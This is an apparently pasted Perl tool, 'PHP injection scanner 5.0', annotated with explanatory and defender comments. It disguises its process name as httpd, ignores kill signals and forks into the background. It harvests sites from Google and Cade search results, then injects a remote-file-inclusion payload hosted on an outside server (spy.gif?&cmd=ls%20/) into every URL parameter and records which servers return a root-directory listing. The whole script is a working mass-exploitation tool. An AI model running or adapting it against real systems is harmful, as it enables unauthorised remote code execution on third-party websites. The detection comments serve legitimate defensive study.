rutera

PHP injection scanner

Jan 8th, 2015
Perl 5.33 KB | None | 0 0
  1. #!/usr/bin/perl
  2.  
  3. use LWP::Simple;
  4. use IO::Socket::INET;
  5.  
  6.  
  7.  
  # Start-up banner and argument check. The single command-line argument
  # ("procura", Portuguese for "search") is the search-engine query used later.
  8. print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
  9. print "\t[ PHP injection scanner 5.0 priv8 version \n\n\n";
  10.  
  # @ARGV[0] is a one-element array slice; when no argument is given the
  # script prints its usage line and exits before doing anything else.
  11. if(!@ARGV[0]){
  12. print "\t[ use: perl php5.0.pl <procura> ]\n\n";
  13. exit;
  14. }
  # Process-name disguise and backgrounding. "Camuflando pid" is Portuguese
  # for "camouflaging pid".
  # Defender note: $0 is overwritten below with a string that resembles an
  # Apache httpd path. On platforms where Perl supports it, assigning to $0
  # changes the name shown in process listings, so the interpreter may not
  # appear as "perl". Comparing the claimed command name with the actual
  # executable image of the process exposes this kind of masquerading.
  15. print "\t[ Camuflando pid ]\n";
  16. my $processo = "/usr/local/sbin/httpd - spy";
  # INT, HUP, TERM and CHLD are set to be ignored, so Ctrl-C, a terminal
  # hang-up and a plain kill do not end the script (SIGKILL cannot be ignored).
  # NOTE(review): "PS" does not look like a signal name; that assignment
  # probably has no effect.
  17. $SIG{"INT"} = "IGNORE";
  18. $SIG{"HUP"} = "IGNORE";
  19. $SIG{"TERM"} = "IGNORE";
  20. $SIG{"CHLD"} = "IGNORE";
  21. $SIG{"PS"} = "IGNORE";
  22.  
  # The fake name is padded with 16 NUL characters before being stored in $0.
  23. $0="$processo"."\0"x16;;
  # fork: the parent exits at once, so the invoking shell gets its prompt back
  # while the child keeps running. The die only fires when fork returned undef.
  24. my $pid=fork;
  25. exit if $pid;
  26. die "Problema com o fork: $!" unless defined($pid);
  27.  
  # Only the child reaches this line, where $pid is 0, so the message prints 0
  # rather than the real process id.
  28. print "\t[ Pid: $pid Processo: $processo ]\n";
  29.  
  # Scratch files, all created in the current working directory.
  #   $caxe, $caxe1 : "." followed by rand(9999), i.e. dot-prefixed (hidden)
  #                   names containing a fractional number.
  #   $arq          : the "." assigned first is overwritten on the next line,
  #                   so the name is a bare integer below 9999 (not hidden).
  # Defender note: nothing in the code shown here deletes these files, so they
  # remain as artifacts in the directory the script was started from.
  30. $caxe = ".";
  31. $caxe1 = ".";
  32. $caxe .= rand(9999);
  33. $caxe1 .= rand(9999);
  34. $arq = ".";
  35. $arq = int rand(9999);
  36.  
  # Two-argument open with a bareword handle and no error check; ">" creates
  # or truncates the file that will hold the harvested URL list.
  37. open(sites,">$arq");
  38. print sites "";
  39. close(sites);
  40.  
  41.  
  # The search term comes straight from the command line and is interpolated
  # into request URLs further down without any encoding.
  # "Procurando por ... no Google" = "Searching for ... on Google".
  42. $procura = @ARGV[0];
  43. chomp $procura;
  44. print "\t[ Procurando por $procura no Google ]\n";
  # Harvest candidate URLs from Google result pages.
  # The loop walks result offsets 0, 10, ... 890 and opens a raw TCP connection
  # to www.google.com.br:80 for each one; a failed connect skips that page.
  45. for($n=0;$n<900;$n += 10){
  46. $sock = IO::Socket::INET->new(PeerAddr => "www.google.com.br", PeerPort => 80, Proto => "tcp") or next;
  # Defender note on the wire format: the request line is followed by "\n\n",
  # and the header strings below are written with no line terminators at all.
  # NOTE(review): as written these bytes arrive after the blank line that ends
  # the request, which makes the traffic distinctive for network detection.
  47. print $sock "GET /search?q=$procura&start=$n HTTP/1.0\n\n";
  48. print $sock "Host: www.google.com.br";
  49. print $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.0.1) Gecko/20020823 Netscape/7.0";
  50. print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1";
  51. print $sock "Accept-Language: pt-br, pt;q=0.50";
  52. print $sock "Accept-Encoding: gzip, deflate, compress;q=0.9";
  53. print $sock "Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66";
  54. print $sock "Keep-Alive: 300";
  55. print $sock "Connection: keep-alive";
  56.  
  # The whole response is read into @resu and joined into one string in $ae.
  57. @resu = <$sock>;
  58. close($sock);
  59. $ae = "@resu";
  # Each pass replaces the first remaining <a href=...>...</a> in $ae with its
  # href value and keeps that value in $uber, so the loop ends when no anchor
  # is left.
  60. while ($ae=~ m/<a href=.*?>.*?<\/a>/){
  61.   $ae=~ s/<a href=(.*?)>.*?<\/a>/$1/;
  62.   $uber=$1;
  # Filter chain: a link is kept only if it contains "http" and none of
  # "translate", "cache", a double quote, "google", "216" or "start=".
  # NOTE(review): these look like exclusions for the search engine's own
  # links - confirm.
  63.    if ($uber !~/translate/)
  64.    {
  65.    if ($uber !~ /cache/)
  66.    {
  67.    if ($uber !~ /"/)
  68.    {
  69.    if ($uber !~ /google/)
  70.    {
  71.    if ($uber !~ /216/)
  72.    {
  73.    if ($uber =~/http/)
  74.    {
  75.    if ($uber !~ /start=/)
  76.    {
  # Surviving links are appended, one per line, to the integer-named list file.
  77.      open(arq,">>$arq");
  78.           print arq "$uber\n";
  79.           close(arq);
  80. }}}}}}}}}
  # Harvest candidate URLs from a second search engine (Cade, served from
  # cade.search.yahoo.com). "Procurando por ... no Cade" = "Searching for ...
  # on Cade".
  81. print "\t[ Procurando por $procura no Cade   ]\n";
  82.  
  # Result offsets 1, 11, ... 991 are requested through LWP::Simple's get(),
  # again with the raw search term interpolated into the URL.
  83. for($cadenu=1;$cadenu <= 991; $cadenu +=10){
  84.  
  85. @cade = get("http://cade.search.yahoo.com/search?p=$procura&ei=UTF-8&fl=0&all=1&pstart=1&b=$cadenu") or next;
  86. $ae = "@cade";
  87.  
  # Each pass replaces the first remaining <em class=yschurl>...</em> element
  # with its inner text and keeps that text in $uber.
  88. while ($ae=~ m/<em class=yschurl>.*?<\/em>/){
  89.   $ae=~ s/<em class=yschurl>(.*?)<\/em>/$1/;
  90.   $uber=$1;
  91.  
  # Spaces and <b>/</b> markup are stripped from the displayed URL text.
  92. $uber =~ s/ //g;
  93. $uber =~ s/<b>//g;
  94. $uber =~ s/<\/b>//g;
  95.  
  # Unlike the Google branch, no filter is applied here: every extracted
  # value is appended to the same list file.
  96. open(a,">>$arq");
  97. print a "$uber\n";
  98. close(a);
  99. }}
  # De-duplicate the harvested URL list in place.
  # "Pronto sites pegos no google e cade" = "Done, sites collected from Google
  # and Cade"; "Excluindo os sites repetidos" = "Removing duplicate sites".
  100. print "\t[ Pronto sites pegos no google e cade ]\n";
  101. print "\t[ Excluindo os sites repetidos ]\n";
  102. $ark = $arq;
  103. @si = "";
  # The whole list file is read into @si (opens are unchecked).
  104. open (arquivo,"<$ark");
  105. @si = <arquivo>;
  106. close(arquivo);
  107. $novo ="";
  # %si is the "already seen" set, keyed by the full line including its
  # newline; only the first occurrence of each line is copied to $novo.
  108. foreach (@si){
  109. if (!$si{$_})
  110. {
  111. $novo .= $_;
  112. $si{$_} = 1;
  113. }
  114. }
  # The file is then overwritten with the de-duplicated content.
  115. open (arquivo,">$ark");
  116. print arquivo $novo;
  117. close(arquivo);
  118.  
  119.  
  # Load the de-duplicated list into @sites, one chomped line per element.
  # $a and $b both end up holding the number of lines read; note that these
  # are the package variables Perl's sort also uses.
  120. $a =0;
  121. $b =0;
  122. open(ae,"<$arq");
  123. while(<ae>)
  124. {$sites[$a] = $_;
  125.   chomp $sites[$a];
  126.   $a++;
  127.   $b++;}
  128. close(ae);
  # "Total de sites para scanear" = "Total sites to scan".
  129. print "\t[ Total de sites para scanear: $a ]\n";
  # Main loop: for every harvested site, collect the links on its page, turn
  # each parameterised link into a remote-file-inclusion test URL, request
  # those URLs, and record the ones whose response matches a crude success
  # check. This block is deliberately left byte-identical; the comments only
  # describe what it does so that the resulting traffic and artifacts can be
  # recognised.
  130. for ($a=0;$a<=$b;$a++){
  # Both hidden scratch files are truncated at the start of every site.
  131. open (file, ">$caxe");
  132.       print file "";
  133. close(file);
  134. open (file, ">$caxe1");
  135.       print file "";
  136. close(file);
  # $k and $e are set here but not used again in the code shown.
  137. $k=0;
  138. $e=0;
  # Fetch the site's page with LWP::Simple; a failed fetch skips the site.
  139. $data=get($sites[$a]) or next;
  # Each pass replaces the first remaining <a href="...">...</a> with its href
  # value and keeps that value in $ubersite.
  140.   while($data=~ m/<a href=".*?">.*?<\/a>/){
  141.   $data=~ s/<a href="(.*?)">.*?<\/a>/$1/;
  142.   $ubersite=$1;
  143.  
  # Anything from the first double quote onwards is cut off.
  144.   if ($ubersite =~/"/)
  145.    {
  146.    $nu = index $ubersite, '"';
  147.    $ubersite = substr($ubersite,0,$nu);
  148.    }
  # Links without "http" are treated as relative and prefixed with the site URL.
  149. if ($ubersite !~/http/)
  150. {$ubersite = $sites[$a].'/'.$ubersite;}
  # The link is appended to the first scratch file; this is one of the few
  # opens in the script whose failure is checked.
  151. open(file,">>$caxe") || die("nao abriu caxe.txt $!");
  152. print file "$ubersite\n";
  153. close(file);
  154. }
  155.  
  # $lista1 is the test payload: an absolute URL on an external host with a
  # cmd=ls%20/ query. It is appended below as the value of a query parameter.
  # A PHP page that passes such a parameter to include/require with remote
  # includes enabled would fetch and run the remote file.
  # Defender note: in web-server access logs this shows up as requests whose
  # parameter value is an http:// URL ending in "spy.gif?&cmd=ls%20/".
  # Keeping PHP's allow_url_include disabled and never passing request
  # parameters to include/require without an allowlist closes the hole that
  # is being probed.
  156. $lista1 = 'http://www.spykidsgroup.com/spy.gif?&cmd=ls%20/';
  157. $t =0;
  158. $y =0;
  159. @ja;
  # Read the collected links back into @ja; $y ends up as the line count.
  160. open(opa,"<$caxe") or die "nao deu pra abrir o arquivo caxe.txt";
  161. while (<opa>)
  162. {
  163. $ja[$t] = $_;
  164. chomp $ja[$t];
  165. $t++;
  166. $y++;
  167. }
  168. close(opa);
  # Iteration starts at index 1, so the first collected link is never used.
  169. $t=1;
  170. while ($t < $y)
  171.    {
  # Only links that contain "=" (i.e. carry a parameter) are considered.
  172.     if ($ja[$t] =~/=/)
  173.       {
  # First candidate: the link cut just after its LAST "=", plus the payload.
  174.        $num = rindex $ja[$t], '=';
  175.        $num += 1;
  176.        $ja[$t] = substr($ja[$t],0,$num);
  177.             open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar caxe1.txt";
  178.             print jaera "$ja[$t]$lista1\n";
  179.             close(jaera);
  # Second candidate: the same link cut just after its FIRST "=", plus the
  # payload. $num1 and $subproc are computed but not used again in the code
  # shown.
  180.         $num = index $ja[$t], '=';
  181.         $num += 1;
  182.         $ja[$t] = substr($ja[$t],0,$num);    
  183.         $num1 = rindex $ja[$t], '.';
  184.         $subproc = substr($ja[$t],$num1,$num);
  185.  
  186.             open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar caxe1.txt";
  187.             print jaera "$ja[$t]$lista1\n";
  188.             close(jaera);
  189.       }
  190.      $t++;
  191.      }
  # De-duplicate the candidate file in place. %si is the same hash used for
  # the site list and is never cleared in the code shown, so a candidate
  # already seen for an earlier site is dropped as well.
  192. $ark = "$caxe1";
  193. @si = "";
  194. open (arquivo,"<$ark");
  195. @si = <arquivo>;
  196. close(arquivo);
  197. $novo ="";
  198. foreach (@si){
  199. if (!$si{$_})
  200. {
  201. $novo .= $_;
  202. $si{$_} = 1;
  203. }
  204. }
  205. open (arquivo,">$ark");
  206. print arquivo $novo;
  207. close(arquivo);
  # Load the de-duplicated candidates into @hot; $w ends up as the line count.
  208.    $q=0;
  209.    $w=0;
  210.     @hot;
  211.    open (ops,"<$caxe1");
  212.    while(<ops>)
  213.    {
  214.    $hot[$q] = $_;
  215.    chomp $hot[$q];
  216.    $q++;
  217.    $w++;
  218.    }
  219.    close(ops);
  # "Começando o scan aguarde. Pode demorar horas." = "Starting the scan,
  # please wait. It may take hours."
  220. print "\t[ Começando o scan aguarde. Pode demorar horas. ]\n";
  221. for($q=0;$q<=$w;$q++)
  222.   {
  223.  
  # Each candidate containing "http" is requested with get(); a failed fetch
  # moves on to the next candidate.
  224.   if ($hot[$q] =~/http/)
  225.     {
  226.    $tipo=get($hot[$q]) or next;
  # Success heuristic: the response must contain the substrings "root", "etc"
  # and "boot" - presumably the directory names an "ls /" listing would show.
  # Defender note: these are plain substring matches anywhere in the page, so
  # an entry in res.txt is a lead to verify, not proof of compromise.
  227.    if($tipo =~/root/)
  228.          {
  229.          if ($tipo =~/etc/)
  230.           {
  231.           if ($tipo =~/boot/)
  232.            {
  # Matching URLs are appended to res.txt in the current working directory.
  233.     open(a,">>res.txt");
  234.     print a "$hot[$q]\n";
  235.     close(a);
  236.                  }}}}}}
  237.  
  # Closing messages: "Pronto scanner concluido" = "Done, scanner finished";
  # "O resultado foi salvo no ftp do spykids" = "The result was saved on the
  # spykids FTP".
  # NOTE(review): nothing in the code shown uploads anything; the only result
  # output visible here is the local res.txt file. The final statement has no
  # trailing semicolon, which Perl accepts for the last statement of a file.
  238. print "\t[ Pronto scanner concluido ]\n";
  239. print "\t[ O resultado foi salvo no ftp do spykids ]\n"